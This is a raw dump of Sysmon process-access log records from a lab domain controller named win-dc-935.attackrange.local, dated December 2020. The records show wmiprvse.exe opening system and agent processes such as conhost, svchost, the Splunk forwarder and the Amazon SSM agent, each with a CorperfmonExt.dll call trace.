13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 